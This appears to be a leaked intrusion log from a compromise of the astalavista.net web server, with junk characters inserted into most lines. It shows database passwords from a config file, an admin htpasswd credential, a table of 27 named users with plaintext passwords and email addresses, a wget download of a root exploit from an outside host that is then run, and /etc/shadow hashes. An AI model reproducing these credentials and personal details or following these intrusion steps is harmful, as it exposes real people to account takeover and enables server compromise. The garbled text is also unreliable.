4 A9 g* j6 M0 d9 x6 odrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
2 |9 P( h( o, U5 s' Ldrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
' b9 T/ h# {1 w4 a9 k4 ^drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0070 D2 |* T4 m% K2 @5 h
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
& K" J! ^( d% Wdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com3 j k/ P. g- M3 A. U$ x4 m
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
|, @+ C3 B6 C' I0 k2 n' z7 kdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
& p! P, z+ w, z/ @-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg6 G4 N: I2 _# Y1 c
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
, S; F4 Y: N7 |" O& A$ ]: Zdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
8 ^0 q# _! P0 ]4 Qdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd4 [. g6 {7 K* p0 ^+ j% }8 g
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
T. K- x( ]6 H: V( P" U-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
- G$ K2 L/ c1 z' h; S$ Adrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
4 Q: w9 V# P! udrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour6 u7 t# |0 C+ @. o: ]
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess4 H1 x" U- P q& C3 z
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess4 ]" u1 L% `( ^2 W% k! d c# d9 Q& |
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php: k. @' c: \* D8 b) m/ V( D; Q
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html) v0 T2 `/ c4 k2 q: z8 F5 I2 L1 W8 u* r
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
6 k) b% w3 f" r+ i! [1 `-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
' r$ }- _; p+ j! j-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
" [- h& U! p: C3 U4 {4 Y+ ~drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
5 c; |( A2 B/ r8 `drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
) l/ q( Q' k9 l. g. n0 K Hdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib( t# i: H. C* ^- K5 a
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
5 F5 i/ ?* \) ^4 U7 Wdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member2 b8 k: H- ^3 D4 z3 B7 M% L2 x
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata, w! I$ C! W. @2 @( U
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new$ }+ X* ~: H, H; Z6 y
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
+ \0 j, ?$ D9 U9 M8 L7 N: ydrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
3 O3 b5 w4 D% N, \9 ^4 R. k-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
[7 T/ L. o: N/ X) ?drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
0 O+ x# d- d% Z9 ]drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources' ^' t9 o0 _- b; `5 } E' \
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
' ]3 r0 W$ o1 i! G! ldrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes: o. D# T g" T) f
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src K: S7 c9 k2 H5 R1 I1 W$ ^
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
, V7 d A( I7 Z- s7 L( a8 t7 B Gdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2. x$ m9 N- r$ M$ w
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old& }0 B! d8 k- }9 r2 c; h, _
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php& c3 B- N2 J" b, D/ u& \
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
5 }% }8 W/ I" o0 B6 ]8 M. v+ s1 D! v; v6 O+ t; b: i- s9 w
sh-3.2$ head -20 index.php: A8 e$ w. v6 W' h; ]
<?PHP$ C) P3 o+ A0 k6 u/ o
/**
! y7 h$ b# s+ C8 `/ b! H* Mainfile (external) for astalavistaNET v2.0
! h& ~; U- n* s: j* s*/ a# ^7 {; W0 q
* @copyright Astalavista IT Engineering GmbH
; t4 I' p! z0 b2 o* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>, r- ~9 {. E" V; A# _/ f/ j
* @version 1.04 k2 _; T. g8 n7 e1 q8 O
*/1 x q6 I n6 s: s& ~0 E9 k" F
/ J9 b9 a+ ^, o, P0 J" w if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
2 s8 @ L* b0 Q8 }7 }+ X1 t $dontStartSession = false;
; g( r; i! J& a } else {
. q$ L) q7 t! m# Z' x $dontStartSession = true;2 f& E/ |/ a9 {" L" Q2 v. M; U
}7 @% t3 I9 }8 ]+ I( g; M2 e" {
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
: J+ O; U1 D9 j; H6 l require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
9 u, c' u% {9 @6 ?2 _ require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
1 g$ e1 Y* J7 m: Y7 v8 X require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);# [/ i5 I) J# A/ i: R6 g: C& `" s
* P6 W; G7 i0 p# @sh-3.2$ cd config1 {* z$ c# I# u/ _0 c6 w2 R
sh-3.2$ ls -la7 b4 {& }) S W9 a
total 32
% W) E+ B+ Q1 r5 kdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
2 c, z8 ^8 Y1 bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 c; j% |( a# w# {! g% c
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php3 y) o% p$ j) L H5 \6 U" B, V
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
9 _5 z2 O* {/ C3 F-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php* }, b- e$ o) f: m0 z2 A$ _
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php3 e6 B3 D. H2 C
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
7 Y3 P; ]3 O% W; P# u( C6 r% M8 I- w& P. {: y, t
sh-3.2$ cat com.conf.php
" _- v1 W: I0 M# D[snip]) T2 h5 D" j$ N) `3 f
//member-database6 g- k- D0 m- I! e0 T( C3 \
$_CONFIG['db_mem_server'] = ‘localhost’;
6 W) G4 z7 l6 R% h7 e4 I; i! Z$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
; R* q3 f4 c# S% o! V9 l$_CONFIG['db_mem_user'] = ‘astanet_db’;7 S: K7 O1 R2 x
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;" U) D: ~3 T: b/ s2 J7 c }
$_CONFIG['db_mem_debug'] = false; //true or false
; Y$ Q" ?4 k% u//ads-database
' u6 h b1 x: C: ]- h& J, p$_CONFIG['db_ads_server'] = ‘localhost’; l2 h% J) B% e# ?
$_CONFIG['db_ads_database'] = ‘astanet_ads’;5 P, B2 u8 v5 {' {
$_CONFIG['db_ads_user'] = ‘astanet_db’;0 r1 }% L9 k( p R( d$ F' w
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;) K" J% h2 X& T' D
$_CONFIG['db_ads_debug'] = false; //true or false
2 K8 t% }- |. e! }; k$ L2 _: l: u//rainbow-database9 E; C$ R$ u5 o: w; ]
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
9 h# U; U' G, i( C9 T3 q$_CONFIG['db_rainbow_database'] = ‘rainbow’;" V/ E1 p. H" w
$_CONFIG['db_rainbow_user'] = ‘dinu’;
8 x* K0 q0 T1 Q/ @$ M$_CONFIG['db_rainbow_password'] = ‘dinudinu’;- z O2 g7 n8 ]: X2 s$ W+ D* ~8 w, N q
$_CONFIG['db_rainbow_debug'] = false; //true or false3 A3 R6 P2 W5 V6 }
//mailing lists database
; V* N# w. M! `% y$_CONFIG['db_mailing_lists_server'] = ‘localhost’;# z1 n) ]" S/ T
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;' S- k% ^' B' G% f* e0 Q* z% ~
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;* V% P( n a0 V1 G+ P: [: H
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
$ |0 u3 a/ v& S7 _, u* I' I* ?: _$_CONFIG['db_mailing_lists_debug'] = false; //true or false
+ Q6 N( R3 g- F3 L3 Y; F//paypal
5 u( O7 M6 N" W0 n* ^ w/ a$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;0 L6 K% _+ ~4 n9 J' W" Q3 P- ?2 _
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;3 P3 T( d- H) Y" c
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
& L, I% U- N' ?) ^$_CONFIG['sub_pp_noship'] = ‘1′;
7 m7 M# ?; A, o# N6 C: W$ ?7 D$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
& c# t7 \& |# {/ l; j. J% q4 U[snip]( I8 p; V3 l7 ^ {& {; B- a; }, b3 c9 U
- d( U) t' [& `' o" W, n$ e T) i! e. f
sh-3.2$ cd ..
5 Z$ b$ ]9 Z8 S/ _) Tsh-3.2$ cd member
, w2 H$ w: l. ysh-3.2$ ls -la
5 c/ Z6 }, b! }/ c" F- h W2 p$ F, {7 Btotal 20
/ F; V x% {( Z! ydrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .' n& b8 w$ F& r; t
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
. y& t! d6 a; a4 o# N-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess1 I. _+ I* b; G9 C6 J
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
9 Y5 y: g9 u i3 B0 q. N/ Wsh-3.2$ cat .htaccess
& L/ X: t% I( PSecFilterEngine off% U7 f" u) E/ D& D" E, `" t& d
. [; ~8 O) H7 o' J/ G% T _sh-3.2$ cd ..1 k5 f. I9 K! c3 M* i: G- d1 Q; B
sh-3.2$ cd cron: i- d/ V) F8 B& b8 i. U
sh-3.2$ ls -la
9 }$ n. Y, z0 X7 `& ptotal 168# }' J! f/ X% k" c
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .$ @) T* P; g8 b/ G" v& _7 M3 y
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., V+ j5 F. G. q3 I$ k
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php3 ` @8 U C$ x1 X
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
6 R4 [; X$ I3 R$ [: q; k5 l A-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
% J" Y" z0 F, `8 v- A7 Z/ z-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php; q( C0 b- k) ]7 K; V! K( j
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php) {/ q3 s: R) W3 m/ ^
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
2 U% P* K$ l) W1 T: G7 J3 n# g& q) F-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
0 {) l V) o+ u. `# Q, H' i8 u2 b-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php& P: x9 @/ T6 L1 r- ?" Z4 n
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh7 L& t+ p l3 q F, }& P
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
/ K8 ]5 t" \8 z7 P-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
) {3 B k+ f$ g5 s( e0 U-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php _# j" x/ j6 y6 }3 d
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh# C/ B, ~; W. }. Z
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php, z6 Z, X$ M+ ~* f: d7 ]
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
- m3 A1 r5 m/ |9 h-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php% W! V8 `( O- c- h" ?' o( A
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
" R$ w# [- T! _. b-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php' b, a& M+ J, j$ C0 \
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email4 h% m9 j4 W- O2 M! w7 {7 s
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
N) H# c, l( u-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php/ D D; q+ W/ B; S& v4 {
- \+ I U7 Q4 {7 o/ Z/ C
sh-3.2$ cd ..
. t _/ X, Q1 \! r/ `! e' Ash-3.2$ cd _007
9 `4 n6 W, D6 w% R7 Lsh-3.2$ ls -la( |, b% g" K" l* ~6 ` h
total 24
% [5 H6 x3 F1 ]& b+ kdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
, ]! O& I* i$ j5 i" C! [2 ]drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..( S4 K* u7 m' k# l% m
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess# F8 K9 S$ F, y3 V
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php2 j5 `3 @& J- n) A6 \) c) ~
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
N% C2 O) {- f y6 udrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
" c& e/ a$ r1 u. y/ E) {. P7 Z( a: \7 q4 z) `
sh-3.2$ cat .htaccess
3 [* B6 W* L( m m5 c$ Y8 O7 BauthType Basic, h3 P5 ?* A5 M, a
authName Admin
0 w; j5 a3 G0 ]" X; x) V: g6 k0 WauthUserFile /home/astanet/auth/.htadm_pwd8 t) H1 o7 E. C# @. @
require valid-user3 [3 o) u! \8 Y- k
! B! e3 D- T3 y
sh-3.2$ cat /home/astanet/auth/.htadm_pwd% p5 I: U) i7 R: L6 ~7 j
admin2net:CR0bl65MwhfT
" _4 b. p1 ?" L _, ?9 ~0 i) x W, }8 G- {: U
sh-3.2$ mysql -u astanet_db -p5 }6 O2 |. V3 ]5 W
Enter password:
( }2 o) E; K+ I; Y$ lWelcome to the MySQL monitor. Commands end with ; or \g.7 c6 P2 B( p- ^% p. u! G4 o
Your MySQL connection id is 275153. D( y0 c' `" i2 S; }# M
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
3 i( i+ M, f$ E+ t; Z3 U% t7 Z5 F( a0 u
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
6 G' `4 q9 R2 r1 m7 y& c# _
, c- t7 S; V7 |mysql> show databases;
/ C: ~6 F& ~ i% _2 @5 m2 V+———————–+
0 ^! I, s B4 _/ o, e+ i8 ~3 M| Database |
# t; Y5 W3 z7 B+———————–+
% S+ J8 J% A3 Q5 M| information_schema |
. W* H* q$ ^7 E" w| astanet_ads |
2 w ]8 ~4 i, F- }| astanet_mailing_lists |
8 j3 E# B9 z- ^ t) G| astanet_mediawiki |7 \6 O. N1 x% D* k2 E" B) `
| astanet_membersystem |0 ^% Z% f& k, S* R5 g) r$ d
| test |: T! T8 I) k: {6 J% y
+———————–+
( h2 C$ O- y7 F$ x2 L6 rows in set (0.00 sec)
8 J o/ R) I! b O! b8 `/ W0 n8 D+ u1 J" k- q9 y4 D5 l9 y+ D8 D
mysql> use astanet_membersystem
7 l1 b: {/ }/ l% m& I' h# DDatabase changed
0 k) A9 |) ^! ?! O9 u7 z" Vmysql> show tables;
8 P4 D# e) H2 D" p: N0 }2 @+———————————–+
+ K! K& |) g# X% |% i) t2 e/ u| Tables_in_astanet_membersystem |6 x% k* X1 W' o1 J2 J
+———————————–+
8 g' L; v$ m& k| blacklist_categories |
+ x: }% ^* G7 r H/ L2 g| blacklist_content |
6 |6 l+ q3 l5 {" R( L| blacklist_levels |6 ^4 |2 S! l3 O" g) x7 [9 n) e
| blacklist_mcset |
7 H% e6 n2 P5 n4 x' y| dir_categories |
[# X2 o! z6 z% U3 a' p$ || dir_comments |
2 |. N3 x6 N4 |7 `" _" g7 o| dir_links |
8 \0 x( o' l' m/ @7 f| dir_temp |
3 |( X9 S, s4 ]5 J, E3 ^0 O# E* Z| dir_votes |
) X1 l# g$ i9 ^2 |2 v8 z| documents |
R4 U; g8 s" ~5 o4 L7 {, L| documents_categories |: {" Q" W5 n: K
| email_content |! y4 \1 t/ J [# Z" ~ d* ]0 Q$ R
| email_settings |
I7 C. q: R' y) g$ [; x| exploits |
+ [' g9 j1 W' ^| exploits_categories |+ [% S# u$ k* o8 w) G4 Q7 W
| exploittree_categories |: E. D3 r; i4 x7 F* r% \) G0 @
| exploittree_exploits |
5 S1 z# ]+ c! H3 q" j. C8 f| home_values |: D9 _- l h3 i: ~, s0 l! s
| iso_countries |+ N5 b6 W6 n! D4 q0 Y# K
| links_categories |
* u& r! R& |0 y/ a# A3 I. ~2 W4 e| links_records |; c: y9 l5 q( `/ q
| links_unauth |$ g8 V& L& j I5 X0 h1 z, d9 l
| links_votes |
! o) l# z2 c" j, c3 F8 [' l| log |
% D6 ]& _8 l# G1 g0 L" ]: x+ P3 O0 || news_categories |3 u0 p% _: g, m$ T E% w
| news_comments |
/ r8 A5 y5 d7 V( H- Z0 N| news_emoticons |5 s& p& J4 W) p& Q, d% _' A! n
| news_latest |
7 k( O6 r. s4 V/ s" m+ s/ g% e U| news_messages |
2 M7 m2 x! J5 B( e @| news_statistics |1 d6 ?* F6 y7 _5 J
| news_votes |
& b3 b2 o8 t5 {| prices_content |
# I0 N$ {; r6 _| prices_offers |
( M5 p! F6 i& P! ^4 T- Y3 C6 L| rss_settings |
8 K: B9 O& z K1 i$ i| sessions |
0 x" ?$ x, r* a; W| stats_signups |$ i% X& T% ~& ^) v3 |
| u2u2 |/ m5 S3 g! d& m! z8 y+ ^
| u2u_contact |/ x; C( c/ a: a8 q, V6 l
| u2u_settings |0 P8 v }7 v7 r4 _1 L5 f
| user_keywords_selected_categories |
7 |* ~8 k0 V6 c0 s| users |) U2 G5 `4 y. M! Y8 o
| users_ipn_test |4 o6 M6 e$ q' p
| users_keyword_values |& e n6 t0 f7 C/ N8 h6 D8 O
| users_profile |7 G8 L. v+ g v
| users_temp |* |' K5 j& z2 ]0 a
| users_upgrade |7 D J7 \8 y2 {+ B3 h# }
+———————————–+- X$ @- r' G9 ~8 L1 x' ^! I
46 rows in set (0.00 sec)& u# V3 A# \& W. W8 L" c" r
: G2 b, o! \- Q6 E2 N+ G2 Q) Jmysql> describe users;9 q0 U* ~: {$ K) ^9 x4 K8 { ]
+————————–+————————————–+——+—–+———————+—————-+# x7 W3 x& }* P0 k) x
| Field | Type | Null | Key | Default | Extra |
5 K2 U$ a5 `- G* }- V7 A( q- u, z+————————–+————————————–+——+—–+———————+—————-+# [$ d# K+ Y0 w' L" d" z) `
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |% i0 [" A: q9 m
| user | varchar(50) | NO | | | |3 n$ \& j! U0 x. L) w7 K
| nickname | varchar(30) | NO | MUL | anonymous | |
. d5 g. V3 t0 ^/ ~6 F. d| password | varchar(30) | NO | | | |
' R/ l6 r# C% ]+ X: q; _| userlevel | tinyint(3) | YES | MUL | NULL | |
" _# M, C) K+ F* j! d5 b| exp | int(8) unsigned | NO | | 0 | |3 f5 l$ ^0 P: C% C |: h* ~
| email | varchar(50) | NO | | | |7 s8 r9 ] G) S
| ip | varchar(15) | NO | | 0 | |; X, q; g% r& _0 a) Q- K/ O" p& O
| proxy | set(’0′,’1′) | NO | | 0 | |$ p" p2 N6 q6 T8 D2 }& z9 n1 P
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
1 D) R$ X R2 y; L( n0 k, }| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |# O) r: K5 G. ^! D# m
| anz_in | tinyint(1) | NO | | -1 | |6 ~# E& I6 O, e! Z% u; y- \' c. O
| status | tinyint(1) unsigned | NO | | 0 | |
& B8 c! E9 z$ ^: @' G| checked | set(’0′,’1′,’2′) | NO | | 0 | |3 w+ S+ x' Y- C! a: x) z$ z
| freemember | set(’0′,’1′) | NO | | 0 | |4 p. @2 f- G1 R- x b
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
( ?/ c+ k& O9 \: Z2 y| lang | tinytext | NO | | | |& I, @! b' @ X3 B6 s6 i
| adid | smallint(6) | NO | | 0 | |
2 p/ S/ [; _% \' Z" t8 h| pp_txn_id | varchar(255) | YES | | NULL | |
* i1 s( c* o1 e& e, {2 ^) k3 D| cnb_transaction_id | varchar(255) | YES | | NULL | |+ F/ U& H, I3 @ p
| cnb_order_id | varchar(255) | YES | | NULL | |& @+ h8 m! E6 ?" N* A
| cnb_user_id | int(11) | YES | | 0 | |& ^3 [( s6 Z. L4 W1 |- D0 j0 E
+————————–+————————————–+——+—–+———————+—————-+0 [1 \- |% v& `' _% i
22 rows in set (0.01 sec)
d7 p/ |" E0 G" E. X& |' a, m" r7 I5 {8 L, ~7 W+ \
mysql> select count(*) as skids from users;
& @. q( x! X b. _6 S+——-+- @. i# b( C' ?3 i: F- w5 `% ~# Y
| skids |# g1 v% W; [8 R
+——-+$ v# J4 @3 `# }; _" o9 z+ K& l
| 25199 |, n$ L0 ~) i7 H: Y0 f1 F+ ^
+——-+
/ D9 v' L* U) \0 a! d6 L1 row in set (0.00 sec)# [& Z& V' d! E" i2 z; F( l
, I& {& B8 w% g$ z, y; i( ] p" umysql> select user,nickname,password,email from users where userlevel = 1;$ y1 m( A# A1 W
+————————–+———————-+——————+———————————–+! R* N: Z z \- V. P* S
| user | nickname | password | email |
* g. J0 \0 W! }% Z, u+ [+————————–+———————-+——————+———————————–++ Y+ ~- A" m. b% i* u+ s( s, M2 n* }
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |( m9 M% E; E9 y( T" m
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |+ Q( S# s2 S3 _/ `9 C1 |- |
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |# Z \" }: T/ X" D. }
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
5 [4 l7 B1 z- L8 U2 H- {6 e| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |3 F. T. P- u o8 Q" Y' J
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
1 a" a$ X* Z: q. V S| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |7 d2 t: l& r" Z/ C9 w: }
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
8 _2 O3 j1 |( `| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |1 X6 B% O$ g* A# O
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |/ Z+ H5 I R! D* p! D7 n4 z; u
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |7 l6 c ]% e' M W5 o3 Y. {) U
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |$ j& o b( Q; u1 C0 {8 r
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |: d, l( D8 G6 e) N& G
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
/ G x9 ~. t. S: v$ c+ Q, y| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
0 d: W) l! B! v| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
! p4 Z) c8 I2 Q1 D, q| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
2 G1 C: V5 C( m| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |! ?" o( [- d0 ^ s
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
/ X2 l+ ^" ~) L" t, h! K| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |# q r! }5 S9 \5 Q: M: W# q
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
/ X8 I3 h7 m) F/ J# M! J& ?| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
9 m, R% y- w, A# I* m| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |9 ]' v8 P7 T, d- M
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
' g: L/ u& Q- Y| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |# q( P7 J1 \4 O+ d1 S: K9 n" D+ R
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |: K6 E/ r3 E5 A6 R
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |# [+ k7 e' Z2 ]5 K
+————————–+———————-+——————+———————————–+
. z7 ^3 A# D( ^% O: j3 b27 rows in set (0.00 sec)
& h. X4 F, o% s, N" \4 A6 j N5 I5 a/ u6 ]/ u0 |# W4 N
mysql> exit;
9 S% G6 ~+ N- i: r7 F" SBye
- \ S' P2 r3 v
$ l$ m! d* F. Z7 p* r) ^& l3 R[~] plaintext passwords? yes,
; r# N: D5 j* M- _Those so called “security professionals” who charge you $6.66 / month to3 u# i: y. c8 A% [8 ]
register at their hack-proof portal, save your passwords in plaintext…
" Z4 G q5 N' A9 B! T1 J: q3 Z) D% }brilliant!# y l! {1 J, Y/ [ t7 H9 M9 e
7 \- n- A. `$ w+ R0 x[~] This been fun but we want more.1 x% ?0 _5 n& `9 m' h% L
9 `- N8 G3 C2 o, D) h" ~- p
sh-3.2$ uname -a' R8 w) C" j# o
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
7 t- a' q& w" W$ X8 C2 R0 M7 Psh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]1 r B: q) m: M( l- F: @
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
. i' t; j9 q4 P8 K U# l! ]- ]Resolving anti.sec.labs… 13.33.33.379 f( G* r, V9 I: P
Connecting to anti.sec.labs|13.33.33.37|:80… connected.( P4 p: v( \$ m3 m2 i4 t9 T
HTTP request sent, awaiting response… 200 OK! o, Y" D& }) i
Length: 18200 (18K) [text/plain]
. S' P9 X5 D7 b7 d) _; NSaving to: `g0troot’
% V8 w1 ]* t7 g! R$ n) d6 l9 G: G& ~# [& k
100%[=========================================================================================================================================>] 18,200 58.6K/s in
6 M! F# a2 W( i* P" R0.3s
* i M8 P* R( s" X7 W4 x5 ^6 x6 J/ d, H9 M$ I% J; K
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
+ J. @8 I X* ]; E
/ J S8 T# R$ f& o9 i \! psh-3.2$ ./g0troot -i x86_64! N# |6 I. `; j' Z, R1 _
[+] g0troot - anti.sec.labs3 Q9 }; B9 _7 l! u' m/ S
[+] Target: 2.6.18-128.1.10.el5; v4 `, ~* o1 w8 a
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]; k' a& h/ W1 q) k8 U/ M
7 z) E5 W+ F4 x1 I
[+] r00tr00t
6 ]( e3 ]% R' U[~] Executing shell… X2 `5 j7 }+ u- S
3 M" z% d! \# [
sh-3.2# id
9 b5 w+ H: p( r- guid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)) i7 y% g+ F. R2 r
0 L& N/ p$ k2 A& {+ h2 y( Tsh-3.2# cat /etc/shadow7 `0 f$ J# V' W( K) `
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::9 l9 g% O) U$ q! d
[snip]: n+ j$ P7 u5 l+ P& G
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::" \! ~: R" V5 l2 h9 o) b4 p4 r9 y
